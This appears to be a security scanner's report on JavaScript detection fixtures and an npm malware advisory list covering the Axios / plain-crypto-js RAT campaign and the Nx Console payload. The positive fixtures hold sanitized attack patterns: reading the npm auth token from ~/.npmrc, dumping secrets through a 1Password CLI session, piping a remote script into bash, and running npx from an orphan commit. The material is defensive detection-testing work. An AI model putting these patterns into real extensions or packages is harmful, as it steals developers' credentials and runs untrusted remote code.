NPM Safety Guard

`{file_path}` reads or spawns against a credential file path. Extensions have no reason to touch these locations.

  // POSITIVE FIXTURE — GITHUB-TOKEN-NPMRC
  // Reference: https://socket.dev/blog/supply-chain-attack-iceberg-javascript
  
  const os = require('os');
  const fs = require('fs');
  const path = require('path');
  
▶ const npmrcPath = path.join(os.homedir(), '.npmrc');
  const content = fs.readFileSync(npmrcPath, 'utf8');
  const tokenLine = content.split('\n').find(l => l.includes('_authToken'));
  module.exports = { token: tokenLine?.split('=')[1]?.trim() };
  

`{file_path}` reads or spawns against a credential file path. Extensions have no reason to touch these locations.

  // NEGATIVE FIXTURE — should NOT trigger GITHUB-TOKEN-NPMRC
  // Legitimate .npmrc writer for CI — writes scope registry only, no token extraction.
  
  const fs = require('fs');
  const path = require('path');
  
  function writeNpmrc(projectDir, registry) {
▶   const rcPath = path.join(projectDir, '.npmrc');
    fs.writeFileSync(rcPath, `registry=${registry}\n`);
  }
  
  module.exports = { writeNpmrc };
  

`{file_path}` issues an HTTP call to `{url}`. Confirm this is a documented integration; outbound calls to arbitrary hosts widen the extension's trust surface.

          title: "Axios Supply Chain — RAT via plain-crypto-js",
          description: "Maintainer account compromised (Sapphire Sleet / North Korea). " +
              "These versions inject plain-crypto-js@4.2.1 which runs a postinstall " +
              "script that deploys a cross-platform Remote Access Trojan (RAT) on " +
              "macOS, Windows, and Linux. Malware phones home to sfrclak.com:8000 " +
              "and self-deletes to evade forensics. Rotate ALL credentials if installed.",
          safeVersion: "1.14.0",
          reportedAt: "2026-03-31",
          sources: [
              "https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan",
▶             "https://cloud.google.com/blog/topics/threat-intelligence/north-korea-threat-actor-targets-axios-npm-package",
              "https://www.microsoft.com/en-us/security/blog/2026/04/01/mitigating-the-axios-npm-supply-chain-compromise"
          ]
      },
      // ─── plain-crypto-js (the dropper itself) ─────────────────────────────────
      {
          package: "plain-crypto-js",
          versions: ["4.2.1"],
          severity: "critical",
          title: "plain-crypto-js — Malicious RAT Dropper",
          description: "Not a legitimate package. Created by Sapphire Sleet as a delivery " +

`{file_path}` issues an HTTP call to `{url}`. Confirm this is a documented integration; outbound calls to arbitrary hosts widen the extension's trust surface.

          package: "plain-crypto-js",
          versions: ["4.2.1"],
          severity: "critical",
          title: "plain-crypto-js — Malicious RAT Dropper",
          description: "Not a legitimate package. Created by Sapphire Sleet as a delivery " +
              "vehicle for the Axios supply chain attack. Contains postinstall hook " +
              "that deploys WAVESHAPER.V2 backdoor. Never a dependency of real Axios. " +
              "If found in node_modules, assume the host is fully compromised.",
          reportedAt: "2026-03-31",
          sources: [
▶             "https://snyk.io/blog/axios-npm-package-compromised-supply-chain-attack-delivers-cross-platform/"
          ]
      },
      // ─── @shadanai/openclaw (secondary vector) ────────────────────────────────
      {
          package: "@shadanai/openclaw",
          versions: ["2026.3.28-2", "2026.3.28-3", "2026.3.31-1", "2026.3.31-2"],
          severity: "critical",
          title: "@shadanai/openclaw — Vendors plain-crypto-js payload",
          description: "Found to vendor the malicious plain-crypto-js payload directly. " +
              "Part of the same Axios supply chain attack campaign.",

`{file_path}` issues an HTTP call to `{url}`. Confirm this is a documented integration; outbound calls to arbitrary hosts widen the extension's trust surface.

      // ─── @shadanai/openclaw (secondary vector) ────────────────────────────────
      {
          package: "@shadanai/openclaw",
          versions: ["2026.3.28-2", "2026.3.28-3", "2026.3.31-1", "2026.3.31-2"],
          severity: "critical",
          title: "@shadanai/openclaw — Vendors plain-crypto-js payload",
          description: "Found to vendor the malicious plain-crypto-js payload directly. " +
              "Part of the same Axios supply chain attack campaign.",
          reportedAt: "2026-03-31",
          sources: [
▶             "https://thehackernews.com/2026/03/axios-supply-chain-attack-pushes-cross.html"
          ]
      },
      // ─── @qqbrowser/openclaw-qbot ─────────────────────────────────────────────
      {
          package: "@qqbrowser/openclaw-qbot",
          versions: ["0.0.130"],
          severity: "critical",
          title: "@qqbrowser/openclaw-qbot — Ships tampered axios@1.14.1",
          description: "Bundles a tampered axios@1.14.1 with plain-crypto-js injected as a " +
              "dependency in its node_modules folder. Same RAT campaign.",

`{file_path}` imports child_process and calls exec / spawn / execFile / fork. Subprocess execution lets the extension pivot from the VSCode host into the user's shell.

  // Source: Sanitized pattern from Nx Console v18.95.0 extension activation payload.
  // Reference: https://github.com/advisories/GHSA-c9j4-9m59-847w
  // Reference: https://github.com/nrwl/nx-console/issues/3140
  //
  // The actual SHA used in the attack was a deleted orphan commit.
  // This fixture uses a placeholder SHA to verify pattern detection.
  
  const { execSync } = require('child_process');
  
  function runBootstrap() {
▶   execSync('npx -y github:nrwl/nx-console#a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2', { stdio: 'inherit' });
  }
  
  module.exports = { runBootstrap };
  

`{file_path}` imports child_process and calls exec / spawn / execFile / fork. Subprocess execution lets the extension pivot from the VSCode host into the user's shell.

  // POSITIVE FIXTURE — ONEPASSWORD-CLI-SESSION
  // Reference: https://www.stepsecurity.io/blog/nx-console-malicious-extension
  // Sanitized from Nx Console v18.95.0 payload — only the env-var access pattern.
  
  const { execSync } = require('child_process');
  
  const opSession = process.env.OP_SESSION_my;
  if (opSession) {
▶   const result = execSync(`op run --session=${opSession} -- env`).toString();
    module.exports = { result };
  }
  

`{file_path}` imports child_process and calls exec / spawn / execFile / fork. Subprocess execution lets the extension pivot from the VSCode host into the user's shell.

  // NEGATIVE FIXTURE — should NOT trigger BUN-RUNTIME-AUTOINSTALL
  // Legitimate Bun build step — called from a user-controlled script, not auto-installed
  // from the network during extension/package activation.
  
  const { execSync } = require('child_process');
  
  function buildWithBun() {
    // Assumes Bun is already installed by the developer.
▶   execSync('bun run build', { stdio: 'inherit' });
  }
  
  module.exports = { buildWithBun };
  

`{file_path}` imports child_process and calls exec / spawn / execFile / fork. Subprocess execution lets the extension pivot from the VSCode host into the user's shell.

  // POSITIVE FIXTURE — BUN-RUNTIME-AUTOINSTALL
  // Reference: https://github.com/nrwl/nx-console/issues/3140
  // The Nx Console payload downloaded and executed Bun to bypass the Node sandbox.
  
  const { execSync } = require('child_process');
  const os = require('os');
  const path = require('path');
  
  function installBun() {
▶   execSync('curl -fsSL https://bun.sh/install | bash', { stdio: 'inherit' });
    const bunPath = path.join(os.homedir(), '.bun', 'bin', 'bun');
    execSync(`${bunPath} install`, { cwd: __dirname });
  }
  
  module.exports = { installBun };
  

`{file_path}` imports child_process and calls exec / spawn / execFile / fork. Subprocess execution lets the extension pivot from the VSCode host into the user's shell.

  // NEGATIVE FIXTURE — should NOT trigger NPX-ORPHAN-COMMIT
  // Legitimate npx usage — runs a published package version (no orphan SHA).
  
  const { execSync } = require('child_process');
  
  function runEslint(projectDir) {
▶   execSync('npx eslint --ext .ts,.js .', { cwd: projectDir, stdio: 'inherit' });
  }
  
  function runPrettier(files) {
    execSync(`npx prettier --write ${files.join(' ')}`, { stdio: 'inherit' });
  }
  
  module.exports = { runEslint, runPrettier };